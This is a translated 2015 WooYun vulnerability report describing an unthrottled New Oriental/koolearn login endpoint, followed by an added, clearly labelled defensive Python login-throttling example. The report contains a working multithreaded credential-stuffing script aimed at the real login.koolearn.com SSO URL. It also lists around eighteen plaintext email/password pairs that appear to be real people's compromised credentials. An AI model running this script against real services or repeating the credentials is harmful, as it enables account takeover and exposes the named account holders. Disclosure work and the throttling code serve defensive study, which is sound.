
Vulnerability summary

Defect ID: wooyun-2015-0110964

Title: Design flaw in a New Oriental login page allows credential stuffing

Vendor: New Oriental (新东方)

Author: jaffer

Submitted: 2015-04-29 20:38

Fixed: 2015-06-14 17:28

Published: 2015-06-14 17:28

Vulnerability type: Design flaw / logic error

Severity: Medium

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-04-29: Details reported to the vendor, awaiting vendor response
2015-04-30: Vendor confirmed; details disclosed to the vendor only
2015-05-10: Details disclosed to core white hats and relevant domain experts
2015-05-20: Details disclosed to regular white hats
2015-05-30: Details disclosed to intern white hats
2015-06-14: Details disclosed to the public

Summary:

See title.

Details:

URL:

http://115.182.44.211/index.php/site/login


The page authenticates through the koolearn account system. Although it is the teacher login, a valid user still gets a success response, and the login endpoint enforces no restrictions at all.
A simple Python script; the file named email holds email/password pairs, one per line.

#!/usr/bin/env python
#-*-coding:utf-8-*-
import httplib2
import urllib2
import urllib
import socket
from urllib import urlopen
from string import replace,find,lower
from httplib import HTTPException
import time
import threadpool
import threading
mutex = threading.Lock()
class fuzz(object):
    def __init__(self,user_pwd,count):
        self.user_pwd = user_pwd
        self.good = []
        self.count = count
        self.threadnum = 10
    def makePackage(self,euser,epwd):
        url = 'http://login.koolearn.com/sso/login.do?userName='+euser+'&password='+epwd+'&channel=wangqian&responseType=json&type=jsonp&callback=jQuery18204328589937649667_1430216268449&_=1430226430181'
        print url
        print euser
        print epwd
        headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36'}
        try:
            h = httplib2.Http()
            res,con = h.request(url,'GET',headers = headers)
            print con
        except:
            pass
        i = con.find('error')
        t = []
        if i == -1:
            if mutex.acquire():
                self.good.append([euser,epwd])
                mutex.release()
        else:
            pass

    def preS(self):
        base = 0
        for each in self.user_pwd:
            self.makePackage(each[0],each[1][0:-1])
            if mutex.acquire():
                if len(self.good) != base:
                    self.save()
                    base = len(self.good)
                mutex.release()

    def save(self):
        fp = open('result','w')
        for each in self.good:
            fp.writelines(each[0]+' '+each[1]+'\n')
        fp.close()

    def gothread(self):
        # create the thread pool
        pool = threadpool.ThreadPool(self.threadnum)
        # two lists can be merged by simply adding them
        count = 0
        base = 0
        for i in range(self.count):
            print self.user_pwd[i][0]+'----user-----\n' + self.user_pwd[i][1] + '---pass---\n'
            if mutex.acquire():
                if len(self.good) != base:
                    self.save()
                    print 'OK\n'
                    base = len(self.good)
                mutex.release()
            pool.add_task(self.makePackage,self.user_pwd[i][0],self.user_pwd[i][1])
        # join and destroy all threads
        pool.destroy()

if __name__=='__main__':
    f = open('email','r')
    up = []
    count = 0
    while True:
        line = f.readline()
        if line:
            i = line.find(' ')
            user = line[0:i]
            pwd = line[i+1:]
            up.append([user,pwd])
            count = count + 1
        else:
            break
    f.close()
    test = fuzz(up,count)
    test.preS()


Credential stuffing results:

cocoa@263.net fantacy2
jassonz@21cn.com caijun
shunvlh@263.net lh1112
lxhit@21cn.com 781120
billhao@hotmail.com 888999
XuZuotao@263.net.cn 751027
Chinamofee@sohu.com 6y1x3ca
flyfly@21cn.com flying123
childman@163.com chudird
wudw@263.net 556575
dimpleok@hotmail.com jasmine8
jouzen@163.net zhugh
TtiGeR@cableplus.com.cn sysop123
lxy@yytvu .net 58328
linwx1978@sohu.com iamjohns
with2000@21cn.com hello
fair_zhj@163.net 0531fair
liguodong@263.net lgd73
.......


Proof of vulnerability:

cocoa@263.net fantacy2

(screenshot: 1.png)


jassonz@21cn.com caijun

(screenshot: 2.jpg)


billhao@hotmail.com 888999

(screenshot: 3.png)


with2000@21cn.com hello

(screenshot: 45.png)

Fix recommendation:

Add credential-stuffing protection
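The report's recommendation is a single phrase, and the flaw it describes is an endpoint with no throttling that answers differently for valid and invalid accounts. The following Python 3 code is an added example, not part of the original report or of the vendor's system: a sliding-window login guard that evaluates three signals before any password check (attempts per IP, failures per account, and distinct usernames tried from one IP, which is the credential-stuffing pattern of one client walking a leaked list). Every threshold, address and username in it is a constructed assumption.

```python
"""Sliding-window throttle and credential-stuffing detector for a login endpoint.

Added example; thresholds, IP addresses and usernames below are constructed.
"""
from collections import defaultdict, deque


class LoginGuard:
    """Decides whether a login attempt may even reach password verification.

    Because the decision is made before the password is checked, a throttled
    request gets the same generic response whether or not the account exists,
    which removes the success/error oracle the report relied on.
    """

    def __init__(self, window_s=300, ip_limit=30, user_fail_limit=5,
                 distinct_user_limit=10):
        self.window_s = window_s                    # sliding window in seconds
        self.ip_limit = ip_limit                    # total attempts per IP in window
        self.user_fail_limit = user_fail_limit      # failures per account in window
        self.distinct_user_limit = distinct_user_limit  # accounts tried per IP
        self._ip_attempts = defaultdict(deque)      # ip -> deque[(ts, user)]
        self._user_failures = defaultdict(deque)    # user -> deque[ts]

    def _trim(self, dq, now, key=lambda item: item):
        """Drop entries older than the window from the left of a deque."""
        while dq and key(dq[0]) < now - self.window_s:
            dq.popleft()

    def decide(self, now, ip, user):
        """Return 'allow', 'block_ip' or 'lock_user' for an incoming attempt."""
        ip_dq = self._ip_attempts[ip]
        self._trim(ip_dq, now, key=lambda item: item[0])
        user_dq = self._user_failures[user]
        self._trim(user_dq, now)
        if len(ip_dq) >= self.ip_limit:
            return 'block_ip'                       # plain brute force from one IP
        if len({u for _, u in ip_dq}) >= self.distinct_user_limit:
            return 'block_ip'                       # one IP, many accounts: stuffing
        if len(user_dq) >= self.user_fail_limit:
            return 'lock_user'                      # one account under guessing
        return 'allow'

    def record(self, now, ip, user, success):
        """Record the outcome of an attempt that was allowed through."""
        self._ip_attempts[ip].append((now, user))
        if success:
            self._user_failures[user].clear()
        else:
            self._user_failures[user].append(now)


def simulate(guard, events):
    """Feed constructed (ts, ip, user, success) events; return one verdict per event.

    Blocked attempts are not recorded: the password was never verified, so
    they must not count as failures against the account.
    """
    verdicts = []
    for ts, ip, user, success in events:
        verdict = guard.decide(ts, ip, user)
        if verdict == 'allow':
            guard.record(ts, ip, user, success)
        verdicts.append(verdict)
    return verdicts


def stuffing_scenario():
    """Constructed: one IP walks a leaked list of 12 distinct accounts, one per second."""
    events = [(float(i), '198.51.100.7', f'user{i:02d}@example.com', False)
              for i in range(12)]
    return simulate(LoginGuard(), events)


def single_account_scenario():
    """Constructed: six wrong passwords for one account from six different IPs."""
    events = [(float(i), f'203.0.113.{i + 1}', 'victim@example.com', False)
              for i in range(6)]
    return simulate(LoginGuard(), events)


def window_expiry_scenario():
    """Constructed: after the window slides past, the blocked IP is allowed again."""
    guard = LoginGuard(window_s=300)
    events = [(float(i), '198.51.100.7', f'user{i:02d}@example.com', False)
              for i in range(12)]
    last = simulate(guard, events)[-1]
    later = guard.decide(400.0, '198.51.100.7', 'user99@example.com')
    return last, later


if __name__ == '__main__':
    print(stuffing_scenario())
    print(single_account_scenario())
    print(window_expiry_scenario())
```

The distinct-username signal is the one that matters for this report: a legitimate user rarely tries more than a handful of accounts from one address, while a stuffing run tries a new account on nearly every request, so it trips long before the raw per-IP limit does. In production the deques would live in a shared store such as Redis, the block would be combined with a CAPTCHA or step-up challenge rather than a hard refusal, and the same generic response body should be returned for throttled, invalid and unknown-account cases.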

Copyright notice: when reposting, credit the source jaffer@WooYun (乌云)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed: 2015-04-30 17:26

Vendor comment:

Thank you for supporting New Oriental security.

Latest status:

None